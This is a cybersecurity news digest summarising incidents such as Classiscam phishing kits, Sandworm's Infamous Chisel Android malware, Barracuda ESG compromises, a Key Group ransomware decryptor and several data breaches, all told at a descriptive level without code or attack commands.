Daily Brief

The "Classiscam" scam-as-a-service operation is targeting banks and 251 brands worldwide. Affiliates of Classiscam use phishing kits to create fake ads and pages to steal money, credit card information, and banking credentials. Developers and affiliates split the proceeds, with the developers receiving 20-30% of the revenue. Classiscam has grown significantly, with 90 Telegram channels selling scam kits, 38,000 registered members, and estimated total damage of $29 million. The operation has made $64.5 million in combined earnings and is targeting users in 79 countries. The highest targeting focus is in Europe, with Germany being the most prolific victim. Classiscam has become more automated, using Telegram bots to create phishing and scam ad pages. The operation now includes fake bank login pages to steal e-banking account credentials.

Hackers affiliated with the GRU, the Main Directorate of the General Staff of the Armed Forces of the Russian Federation, have been targeting Android devices in Ukraine with a new malware framework called 'Infamous Chisel' The malware provides backdoor access through the Tor anonymity network, allowing hackers to scan local files, intercept network traffic, and exfiltrate data Infamous Chisel primarily targets Android devices and scans for information related to the Ukrainian military, sending the data to the attackers' servers The malware is capable of gathering hardware information, probing local area networks, and giving attackers remote access Data exfiltration occurs every 86,000 seconds (one day), and the most critical military data is exfiltrated every 600 seconds (ten minutes) The malware is not particularly stealthy and seems to prioritize quick data exfiltration and pivoting to more valuable military networks The UK National Cyber Security Center (NCSC) and the US Cybersecurity and Infrastructure Security Agency (CISA) have released reports on Infamous Chisel, providing technical details and indicators of compromise for detection and defense

Microsoft has joined other organizations in criticizing the draft version of the UN cybercrime treaty The company warns that the proposal is vague and could lead to the criminalization of ethical hacking and security practices Microsoft argues that the treaty could be used by authoritarian states to suppress dissent under the guise of fighting cybercrime The international community needs to protect ethical hackers and include language that ensures lawful cybersecurity work Microsoft also calls for increased transparency and aligning the treaty with existing data protection standards

Stolen or weak usernames and passwords are one of the most potent weapons for cyber adversaries Compromised credentials allow unauthorized access to networks and systems Current security solutions struggle to distinguish between legitimate and malicious use of compromised credentials Attackers use various techniques to obtain compromised credentials, including purchasing them from Dark Web marketplaces or using keyloggers Active Directory (AD) environments are highly vulnerable to attacks using compromised credentials AD lacks native multi-factor authentication (MFA) support, making it susceptible to lateral movement attacks Silverfort Unified Identity Protection offers comprehensive security for AD environments, including continuous monitoring, risk analysis, and active response By implementing Silverfort, organizations can mitigate the risks associated with compromised credentials and enhance AD security posture.

Mobile malware strain called Infamous Chisel targeting Android devices used by the Ukrainian military Malware enables unauthorized access, file scanning, traffic monitoring, and data theft Malware attributed to Russian state-sponsored actor called Sandworm, associated with the Russian Main Intelligence Directorate's (GRU) Main Centre for Special Technologies (GTsST) Sandworm known for disruptive and destructive cyber campaigns, including Industroyer, BlackEnergy, and NotPetya Infamous Chisel contains multiple components for remote access and exfiltration of information from Android phones Malware lacks obfuscation and stealth techniques, indicating low to medium sophistication Another hacking outfit called Gamaredon, backed by the Kremlin, also targeting Ukraine military and government entities with phishing attacks

Toyota Japan experienced a production system malfunction that halted production across 14 plants for 36 hours. The automaker states that the malfunction was not caused by a cyber attack, but the cause is still under investigation. Production resumed as planned on Wednesday. Toyota has previously faced data leaks and other issues, but the incident is not expected to impact production volumes. The company has some slack in its systems that can make up for the missed days of production. This incident is not as severe as previous problems such as recalls due to wheels falling off cars.

Chinese cyberspies compromised nearly a third of organizations through a vulnerability in Barracuda Email Security Gateways Even after victims took action to secure their devices, the cyberspies may still have access through previously planted backdoors Mandiant recommends replacing vulnerable Barracuda equipment US government's Cybersecurity and Infrastructure Security Agency (CISA) released more indicators of compromise associated with the exploitation of the vulnerability Chinese espionage team UNC4841 deployed new and novel malware to maintain presence in high priority targets Approximately five percent of Barracuda ESG appliances were compromised worldwide US and Canadian organizations were hit the hardest, with government agencies making up 27 percent of victims Mandiant revealed a second wave of attacks using new malware families to maintain access to compromised environments.

Russia's Sandworm group, backed by the Kremlin, is using a malware strain called Infamous Chisel to remotely access Ukrainian soldiers' devices Infamous Chisel allows the group to monitor network traffic, access files, and steal sensitive information from the devices The Ukrainian security agency was able to detect and block Sandworm's latest campaign using Infamous Chisel to break into the army's combat data exchange system Researchers have also discovered trojanized Signal and Telegram apps for Android that are part of a Chinese nation-state espionage campaign The fake apps were found to contain the BadBazaar malware, which has been used in the past to spy on ethnic minorities The UK National Cyber Security Centre, along with other international agencies, have confirmed Ukraine's reports of Sandworm's new mobile malware Infamous Chisel is a collection of components that provides backdoor access via the Tor network, allowing for persistent spying on infected devices Sandworm has previously launched other malware campaigns against Ukrainian targets, including ransomware attacks and destructive cyberattacks

A team of security researchers has released a decryption tool to restore files encrypted by the Key Group ransomware. The decryptor only works on a specific version of the ransomware built around August 3. The tool is available for free and was developed by exploiting cryptographic errors made by the ransomware gang. Key Group ransomware uses a fixed password and fixed salt, making it easy to write a decryption routine for the encrypted files. The gang has been telling victims they must pay the ransom to restore their data, despite their mistakes and use of "military-grade" encryption. Key Group has been characterized as a "low-sophisticated threat actor" and has been seen using public and private Telegram channels for their activities.

Classiscam scam-as-a-service program has earned criminals $64.5 million in illicit earnings since 2019 Scammers initially placed fake advertisements on classified sites and used social engineering techniques The scam has become highly automated and can be run on various online platforms Majority of victims are based in Europe, followed by the Middle East and Africa, and the Asia-Pacific Classiscam encompasses 1,366 distinct groups on Telegram, targeting 79 countries and impersonating 251 brands Scammers trick users into buying falsely-advertised goods or services through social engineering Phishing pages are created using Telegram bots, and login credentials are harvested for fraudulent activities Some groups have switched to using stealer malware to collect passwords and transfer data

A new phishing attack targeted civil society groups in South Korea The attack led to the discovery of a remote access trojan called SuperBear The attacker impersonated a member of the organization and sent a malicious LNK file to an activist The LNK file executed a PowerShell command to fetch next-stage payloads from a compromised WordPress website The attack involved process injection using a suspended instance of Explorer.exe The SuperBear trojan establishes communication with a remote server to exfiltrate data and download additional commands and libraries The malware is believed to be associated with a North Korean nation-state actor named Kimsuky This is not the first time North Korean actors have targeted South Korean individuals and organizations

Security experts at EclecticIQ have developed a decryption tool for Key Group ransomware The tool works for versions of the malware built in early August The ransomware uses a static salt in its encryption scheme, making it possible to reverse Key Group is a Russian-speaking threat actor that has attacked various organizations and uses private Telegram channels for ransom negotiations The ransomware appends the .KEYGROUP777TG file extension to all entries and deletes Volume Shadow copies to prevent system restoration Users can run the Python decryption script to search for anddecrypt files with the .KEYGROUP777TG extension, but should backup their data before doing so The release of the decryptor may prompt Key Group to improve the security of its ransomware

LogicMonitor, a network monitoring company, confirms cyberattacks on some users of its SaaS platform The hacking campaign has affected a small number of users Anonymous sources reveal that threat actors hacked customer accounts, created local accounts, and deployed ransomware Ransomware was deployed using the platform's on-premise LogicMonitor Collector sensors The attacks targeting LogicMonitor's customers occurred last week LogicMonitor is investigating technical abnormalities impacting customer accounts Weak default passwords assigned by LogicMonitor to new users were exploited in the attacks LogicMonitor is sharing minimal information with users about the incidents

North Korean state-sponsored hackers are behind a campaign that uploaded malicious packages to the PyPI repository The packages impersonated popular software projects such as the VMware vSphere connector module vConnector The campaign is attributed to the Labyrinth Chollima subgroup of North Korean hackers known as Lazarus The malicious packages featured minimal differences from the originals and contained a malicious function for data collection Data collected from infected machines is sent to the attacker's command and control servers The campaign is linked to Lazarus based on evidence such as the payload decoding routine found in the malicious packages Attribution confidence is high due to similarities with other Lazarus subgroups and the malware they have been associated with

Forever 21, a clothing and accessories retailer, suffered a data breach that exposed the personal information of over 500,000 individuals Hackers had intermittent access to Forever 21 systems between January and March, and stole select files during this time The breach primarily affected current and former Forever 21 employees, not customers Forever 21 has taken steps to ensure the stolen data has been erased, indicating potential communication with the attackers There is no confirmation of a ransomware attack, and the company believes the risk to exposed individuals is low Impacted individuals will receive instructions on enrolling in a free 12-month fraud and identity theft protection service This is not the first data breach for Forever 21, as they previously notified customers of a breach in 2017 affecting payment card data from transactions made between March and October